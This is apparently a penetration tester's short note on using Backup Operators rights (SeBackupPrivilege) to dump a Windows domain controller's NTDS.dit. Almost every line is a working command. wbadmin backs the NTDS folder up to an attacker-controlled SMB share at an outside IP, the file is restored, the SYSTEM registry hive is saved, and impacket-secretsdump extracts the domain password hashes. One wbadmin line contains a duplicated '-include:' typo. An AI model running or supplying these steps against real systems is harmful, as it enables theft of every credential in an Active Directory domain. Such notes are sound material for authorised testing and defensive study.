Backup Operator SeBackupPrivilege dump ntds.dit
Dump NTDS from DC echo y | wbadmin start backup -backuptarget:\\10.10.14.91\share -include:-include:c:\windows\ntds
Create 2gB NTFS partition
Configure samba ![[Pasted image 20240423153016.png]]
Backup to samba echo y | wbadmin start backup -backuptarget:\\10.10.14.91\share -include:c:\windows\ntds
Get Version wbadmin get versions
Recover ntds file to dc readable echo y | wbadmin start recovery -version:???? -itemtype:file -items:C:\windows\ntds\ntds.dit -recoverytarget:c:\ -notrestoreacl
Get SYSTEM hive cmd /c reg save HKLM\SYSTEM system.hiv
Download both and Extract Hashes impacket-secretsdump -ntds ntds.dit -system system.hiv -history LOCAL